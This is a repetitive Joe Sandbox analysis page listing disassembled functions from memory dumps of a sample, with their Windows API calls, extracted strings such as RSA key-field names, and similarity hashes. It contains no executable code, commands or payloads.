Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSUa
API String ID: 4225690600-2086061799
Opcode ID: 1dedc86250a47239049d0da5eb7f2d9ea96b2b3b9515ed5713818baec625c288
Instruction ID: 4f8d4dcb4b42da1a88b135f62f3400868419a01d3c2c2dd95219900ff9f5c512
Opcode Fuzzy Hash: 1dedc86250a47239049d0da5eb7f2d9ea96b2b3b9515ed5713818baec625c288
Instruction Fuzzy Hash: 1D311DB0A016089FDB00CB69C984B6DB7B9AF99308F30859AE514E7751C775E941CF50

Function 6CEB06F9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Strings

RSqb, xrefs: 6CEB0748

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSqb
API String ID: 4225690600-347567867
Opcode ID: 3dd75c302036c626ed5bc977f063b7711639fb1b3a9a8193ada8ac246d441529
Instruction ID: 54f7748ac9b257adb5b3d7fb36a1175007d2c80372297e63c098adca4e6789c3
Opcode Fuzzy Hash: 3dd75c302036c626ed5bc977f063b7711639fb1b3a9a8193ada8ac246d441529
Instruction Fuzzy Hash: 56314DB0A016189FCB00DFA9CE84B6DF7B9AF99308F30859AE514E7741D775E9418F50

Function 6CEB0787 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Strings

RSa, xrefs: 6CEB07D6

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSa
API String ID: 4225690600-3169278968
Opcode ID: b717b4ac98d7b7d90c6724fe260f24b8dd5280ddabf0ff320f33316e33c512cb
Instruction ID: cccd4a83a87bcd3d34dd66db500fbd458103dc97cb3163e357252c5904eaea4e
Opcode Fuzzy Hash: b717b4ac98d7b7d90c6724fe260f24b8dd5280ddabf0ff320f33316e33c512cb
Instruction Fuzzy Hash: A3314BB0A016189FCB00DFA9CE84B6EF7B9AF99308F30859AE418E7741C775E9418F50

Function 6CEB012D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Strings

RS:h, xrefs: 6CEB017F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS:h
API String ID: 4225690600-3891202347
Opcode ID: 0d250f79539a7817b6e3af1f9794423373cd1cfbcca04f429bbf4c4630b6dec3
Instruction ID: d29c2ab90bf66f6f25a613f7e7d6f6fcd0e5b607d0cd4834d7a16ac4a0740c4f
Opcode Fuzzy Hash: 0d250f79539a7817b6e3af1f9794423373cd1cfbcca04f429bbf4c4630b6dec3
Instruction Fuzzy Hash: C0314BB0E016089FDB04CFA9CD84B6EB7B9AF99208F30859AE458E7751C775ED818F50

Function 6CEB0237 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Strings

RS3g, xrefs: 6CEB0286

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS3g
API String ID: 4225690600-2794631155
Opcode ID: 2b82e12a8e16e28b7374e29514d761b911c8263329d9792503978767ac36c267
Instruction ID: 11009bd50ef91f3bf0dbf48d2cdf956793e1413f91abf139edfcc10e18727c70
Opcode Fuzzy Hash: 2b82e12a8e16e28b7374e29514d761b911c8263329d9792503978767ac36c267
Instruction Fuzzy Hash: 60314DB0A016089FCB00CFA9CE84B6DB7B9AF99208F30869AE458E7751C771E945CF50

Function 6CEEC760 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CEEC7EB

Strings

ModPrime1PrivateExponent, xrefs: 6CEEC840
ModPrime2PrivateExponent, xrefs: 6CEEC82C
Prime2, xrefs: 6CEEC876
Prime1, xrefs: 6CEEC88A
MultiplicativeInverseOfPrime2ModPrime1, xrefs: 6CEEC815
PrivateExponent, xrefs: 6CEEC85F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: type_info::operator!=
String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent
API String ID: 2241493438-339133643
Opcode ID: 37fc1f3fe356c7adfd8fcb57307fbd9cec29c188d810c9f4b44696cda916ff78
Instruction ID: 62203f3be3aa03ea45b6f96eba4bcd66c76da4dd29e99ce1b5101b32a2a637bf
Opcode Fuzzy Hash: 37fc1f3fe356c7adfd8fcb57307fbd9cec29c188d810c9f4b44696cda916ff78
Instruction Fuzzy Hash: 73318071A183408EC710DF7DC84659ABBF1AFC9248F214A2EF4449BB60EB71D848CB82

Function 6CEB0457 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Strings

RS%e, xrefs: 6CEB0494

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS%e
API String ID: 4225690600-1409579784
Opcode ID: 2f36d265bae95e9729f11afc9ad694381574ff39b579cfd0c070e2866c18c561
Instruction ID: b52489e47c0d63b6e60f1b3bf5b4e7a72ffe8c49532ce967f8004142d2bfe400
Opcode Fuzzy Hash: 2f36d265bae95e9729f11afc9ad694381574ff39b579cfd0c070e2866c18c561
Instruction Fuzzy Hash: 6D316BB0A016189FCB10CBA9CD84BADF7B9AF95308F30859AE558E7741C775D9418F50

Function 6CEAAA00 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEAAA54
VariantInit.OLEAUT32(?), ref: 6CEAAA5B
VariantInit.OLEAUT32(?), ref: 6CEAAA62
VariantInit.OLEAUT32(?), ref: 6CEAAA69
VariantClear.OLEAUT32(?), ref: 6CEAACF2
VariantClear.OLEAUT32(?), ref: 6CEAACF9
VariantClear.OLEAUT32(?), ref: 6CEAAD00
VariantClear.OLEAUT32(?), ref: 6CEAAD07

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 4322715a52d01a4c6370c58f2123f77499d84f3d426663e8a0192dfd009fe25b
Instruction ID: 53a07fbf01a5391c6faa0dfb2e6c634bfbe9096990014107622413cf7d306c90
Opcode Fuzzy Hash: 4322715a52d01a4c6370c58f2123f77499d84f3d426663e8a0192dfd009fe25b
Instruction Fuzzy Hash: 24C147716087009FD310DFA8C88095AB7F6BFC8708F248A4DE5989B761D771E846CFA2

Function 6CEA9D00 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEA9DEB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEA9DFB
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEA9E29
SafeArrayDestroy.OLEAUT32(?), ref: 6CEA9F25
VariantClear.OLEAUT32(?), ref: 6CEA9FE5

Strings

@, xrefs: 6CEA9DD7

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Bound$ClearDestroyElementVariant
String ID: @
API String ID: 3214203402-2766056989
Opcode ID: bb5cc8fb5b123e33c2cd0ee573f0e8505ccc1a0b2982913f13b7ace03aeffbc1
Instruction ID: b3159edb68d1786026e3099da02f6b65c4877d39a7e4cdcc8f17e73383d2b20e
Opcode Fuzzy Hash: bb5cc8fb5b123e33c2cd0ee573f0e8505ccc1a0b2982913f13b7ace03aeffbc1
Instruction Fuzzy Hash: E0D16A71E012498FDB00DFE8C880AADBBB5BF88308F34815DE515AB755D735AA46CF90

Function 6CEAB300 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEAB3EB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEAB3FB
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEAB429
SafeArrayDestroy.OLEAUT32(?), ref: 6CEAB525
VariantClear.OLEAUT32(?), ref: 6CEAB5E5

Strings

@, xrefs: 6CEAB3D7

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Bound$ClearDestroyElementVariant
String ID: @
API String ID: 3214203402-2766056989
Opcode ID: af5f0546b9f327255cd747e8063c2d9b6e1e65c2154e2ec087a63f3166c21686
Instruction ID: 0cddbaadb9e16c9a99234678836b6d18ea0956d7eaffcac87169c100203237b3
Opcode Fuzzy Hash: af5f0546b9f327255cd747e8063c2d9b6e1e65c2154e2ec087a63f3166c21686
Instruction Fuzzy Hash: C1D15871E0124D8FDB00DFE8C880AADBBB6BF88308F24815DE515AB755D770AA46CF90

Function 6CED1580 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 277COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CED16B2

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

__CxxThrowException@8.LIBCMT ref: 6CED180A

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

Strings

: this key is too short to encrypt any messages, xrefs: 6CED162A
exceeds the maximum of , xrefs: 6CED173F
: message length of , xrefs: 6CED170D
for this public key, xrefs: 6CED1771

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaiseXinvalid_argumentstd::_
String ID: exceeds the maximum of $ for this public key$: message length of $: this key is too short to encrypt any messages
API String ID: 3807434085-412673420
Opcode ID: 677c003647920751c9d48eb5d8ffe5e55e97842ef9550c7e9f17afc7266b0fe6
Instruction ID: 85d282a56e4387ef23e2c15b452b230c820ae176e483d1f99fd38c45dd4bdd53
Opcode Fuzzy Hash: 677c003647920751c9d48eb5d8ffe5e55e97842ef9550c7e9f17afc7266b0fe6
Instruction Fuzzy Hash: 82B14D711083809FD320DB69C890BDBBBE9AFD9318F14891DE59D87751DB70A909CBA3

Function 6CEB3C10 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

SafeArrayGetElement.OLEAUT32(?,?,67D4BDE6), ref: 6CEB3C49
VariantInit.OLEAUT32(?), ref: 6CEB3C81
VariantClear.OLEAUT32(?), ref: 6CEB3D26
VariantClear.OLEAUT32(?), ref: 6CEB3D30
VariantClear.OLEAUT32(?), ref: 6CEB3D89

Strings

ljl, xrefs: 6CEB3C24

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$Clear$ArrayElementInitSafe
String ID: ljl
API String ID: 4110538090-1208423595
Opcode ID: 65038a0e9f47dbae082e4713ecb70c6ee8d381cb1db0e08fcfd00e579fb50d4a
Instruction ID: 4b8e5824d56257523f05e9aa7632fa03c8fcc45245dc98cef83ce39bc4965c7c
Opcode Fuzzy Hash: 65038a0e9f47dbae082e4713ecb70c6ee8d381cb1db0e08fcfd00e579fb50d4a
Instruction Fuzzy Hash: 0A617D76A00249AFCB00DFA8C9819EEBBB5FF49314F25859DE515BB750C731AD05CBA0

Function 6CEF1250 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEF126E

Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113

_memmove.LIBCMT ref: 6CEF12E0
_memmove.LIBCMT ref: 6CEF1305
_memmove.LIBCMT ref: 6CEF1342
_memmove.LIBCMT ref: 6CEF135F

Strings

deque<T> too long, xrefs: 6CEF1269

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 4034224661-309773918
Opcode ID: 89a1ec45e91537d2907cdaf6a89fcf8b29526dca224e4f54f8c28048a8ce7b78
Instruction ID: 2120a584788f4c2a9aab0843dfed3cb21d783365e500fb9bb40f1efa604fd762
Opcode Fuzzy Hash: 89a1ec45e91537d2907cdaf6a89fcf8b29526dca224e4f54f8c28048a8ce7b78
Instruction Fuzzy Hash: B4410AB2A042044BD704CE68CC8056BB7F6EBC4314F2D862DE859D7B44FA74ED068792

Function 6CEF13A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEF13BE

Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113

_memmove.LIBCMT ref: 6CEF1431
_memmove.LIBCMT ref: 6CEF1456
_memmove.LIBCMT ref: 6CEF1493
_memmove.LIBCMT ref: 6CEF14B0

Strings

deque<T> too long, xrefs: 6CEF13B9

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
